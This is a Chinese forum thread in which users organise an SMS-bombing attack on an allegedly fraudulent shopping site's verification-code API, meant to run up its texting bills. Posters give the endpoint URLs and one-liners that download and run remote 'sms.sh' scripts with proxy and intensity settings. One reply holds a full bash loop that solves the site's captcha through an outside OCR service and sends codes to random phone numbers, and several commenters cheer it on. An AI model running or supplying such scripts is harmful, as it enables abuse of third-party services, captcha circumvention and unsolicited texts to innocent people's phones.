前几天那个诈骗网站，又找到一个可以刷他钱的地方

etc小号

https://vipshop.quanminyanxuan.com/h5-DKD-YS/pages/order/orderQuery.html

这就是发短信的地方，随便熟入个手机号，点击发送，会有这样一个链接

https://danrongh5api.shihuak.com/api/users/sms/generateAuthCode?phone=15985626235&type=loginPhone


不过直接这样刷是不不行的，要带请求头，可以直接右键，复制，复制为cURL(bash)

然后把这个curl拿到服务器循环跑就行

while true
do
curl xxxx（复制的内容）
done


我试了下，大概1秒可以跑5条，一小时就是18000条，不知道单条多少钱，对了，号码最好用随机数，一个号码发不了几条

御坂

短信大概一条五分钱，一万条500不到


一小时500块钱，cdn 1G流量才0.15
相当于一小时3T流量，折合等效剑皇带宽为 833MB/s，也就是7Gbps的威力

这边简单的写了个一件脚本，就是楼主发的代码，然后加入了自定义威力设置（因为发现原版程序会把raksmart的小鸡跑到负载2以上，把玩客云负载跑到6以上），使用方法

1. curl -L https://dl.01r.cc/sms.sh -o sms.sh && chmod +x sms.sh && bash sms.sh 5

复制代码

如果用不了，可以试试换下一个链接下载

1. curl -L https://dl-2.01r.cc/sms.sh -o sms.sh && chmod +x sms.sh && bash sms.sh 5

复制代码

想用原版的把链接里的sms.sh改成aaa.sh即可

1. curl -L https://dl.01r.cc/sms2.sh -o sms2.sh && chmod +x sms2.sh && bash sms2.sh 5 --proxy=user:passwd@ip:port

复制代码

sms2.sh 支持传入自定义代理，有时候跑一会就不行了，换个IP才能继续，不知道是不是IP被ban了。


二号下载链接是前阵子论坛里发广告的那个678CDN，免费的那个
下载服务器是10M带宽的raksmart。


这个5代表的是威力大小，数字越大威力越大，5正好是能把玩客云CPU跑到90%左右的情况，所以默认是5

longmao

@etc小号 @御坂 刚翻阿里小号 发现这诈骗网站还有其他站点https://dxjf.vipmalljf.com/pages/order/orderlist.html

短信接口：
https://h5api.lickeji.com/users/sms/generateAuthCode?phone=13988888888&type=loginPhone

御坂

Whbgz 发表于 2023-11-13 23:56
我这跑了差不多3分钟就被拉黑IP了

curl -L https://dl.01r.cc/sms2.sh -o sms2.sh && chmod +x sms2.sh && bash sms2.sh 5 --proxy=user:passwd@ip:port

支持传入http代理

Whbgz

御坂 发表于 2023-11-13 22:03
短信大概一条五分钱，一万条500不到

我家里长辈也经常收到，感谢大佬，已经挂三台机子在跑了

Kotmilys

骗子网站碰上楼主也是倒霉

躺平

我已经开始搞起来
  

etc小号

御坂 发表于 2023-11-13 22:03
短信大概一条五分钱，一万条500不到

代码更新了，现在需要验证码了，我写了个脚本，目前的问题是，识别验证码用的mjj给的，识别率有点低
https://sunk.eu.org/thread-1227092-1-1.html

1. while true
   
2. do
   
3. json_data=$(curl 'https://danrongh5api.shihuak.com/api/users/userCaptcha/captchaVerify' \
   
4.   -H 'authority: danrongh5api.shihuak.com' \
   
5.   -H 'accept: application/json, text/javascript, */*; q=0.01' \
   
6.   -H 'accept-language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6' \
   
7.   -H 'channel: null' \
   
8.   -H 'contenttype: json' \
   
9.   -H 'gdtvid: null' \
   
10.   -H 'origin: https://vipshop.quanminyanxuan.com' \
    
11.   -H 'referer: https://vipshop.quanminyanxuan.com/' \
    
12.   -H 'saascode: W9A8' \
    
13.   -H 'sec-ch-ua: "Chromium";v="118", "Microsoft Edge";v="118", "Not=A?Brand";v="99"' \
    
14.   -H 'sec-ch-ua-mobile: ?1' \
    
15.   -H 'sec-ch-ua-platform: "Android"' \
    
16.   -H 'sec-fetch-dest: empty' \
    
17.   -H 'sec-fetch-mode: cors' \
    
18.   -H 'sec-fetch-site: cross-site' \
    
19.   -H 'sign: 567f34a9919ea9cd7bf732c6973e74a4' \
    
20.   -H 'source: weapp' \
    
21.   -H 'sourceplatform: vipshop' \
    
22.   -H 'timestamp: 1700015165139' \
    
23.   -H 'token: 2bb0b928-047b-752f-a361-b80e25a4f043' \
    
24.   -H 'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Mobile Safari/537.36 Edg/118.0.2088.69' \
    
25.   -H 'uuid: 2bb0b928-047b-752f-a361-b80e25a4f043' )
    
26. key=$(echo $json_data | jq -r '.data.key')
    
27. image=$(echo $json_data | jq -r '.data.image' | sed 's/^data:image\/png;base64,//')
    
28. echo "Key: $key"
    
29. echo "Image: $image"
    
30. 
    
31. result_data=$(curl 'https://ocr.zhu.ee/api.Arithmetic_VerificationCode' -X POST -d '{"ImageBase64": "'"$image"'"}' --header "Content-Type: application/json")
    
32. result=$(echo $result_data | jq -r '.result')
    
33. echo $result_data
    
34. echo $result
    
35. num=$(shuf -i 0-9 -n 8 | tr -d '\n')
    
36. curl "https://danrongh5api.shihuak.com/api/users/sms/generateAuthCode?phone=176$num&type=loginPhone&captchaKey=$key&captchaValue=$result" \
    
37.   -H 'authority: danrongh5api.shihuak.com' \
    
38.   -H 'accept: application/json, text/javascript, */*; q=0.01' \
    
39.   -H 'accept-language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6' \
    
40.   -H 'channel: null' \
    
41.   -H 'contenttype: json' \
    
42.   -H 'gdtvid: null' \
    
43.   -H 'origin: https://vipshop.quanminyanxuan.com' \
    
44.   -H 'referer: https://vipshop.quanminyanxuan.com/' \
    
45.   -H 'saascode: W9A8' \
    
46.   -H 'sec-ch-ua: "Chromium";v="118", "Microsoft Edge";v="118", "Not=A?Brand";v="99"' \
    
47.   -H 'sec-ch-ua-mobile: ?1' \
    
48.   -H 'sec-ch-ua-platform: "Android"' \
    
49.   -H 'sec-fetch-dest: empty' \
    
50.   -H 'sec-fetch-mode: cors' \
    
51.   -H 'sec-fetch-site: cross-site' \
    
52.   -H 'sign: a923dcf0cd9901477bb072aad31193c2' \
    
53.   -H 'source: weapp' \
    
54.   -H 'sourceplatform: vipshop' \
    
55.   -H 'timestamp: 1700015169913' \
    
56.   -H 'token: 2bb0b928-047b-752f-a361-b80e25a4f043' \
    
57.   -H 'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Mobile Safari/537.36 Edg/118.0.2088.69' \
    
58.   -H 'uuid: 2bb0b928-047b-752f-a361-b80e25a4f043' \
    
59.   --compressed
    
60. 
    
61. done
    

复制代码

长泰

我老爸被这种垃圾网站骗了好几次，老人家贪小便宜，又固执又好骗，唉

acm

有些干黑灰的程序员水平太差

8848tjsj

etc小号 发表于 2023-11-13 21:59

这个直接复制下来就能执行吗?我试了下提示参数错误

etc小号

sanxian 发表于 2023-11-14 17:21
充钱了么

我看错了，以为问我用的啥呢，我用的finalshell

⊙⊙

侠之大者，为国为民。楼主威武！！！

关機

搞起来

Lando

好像有点高级啊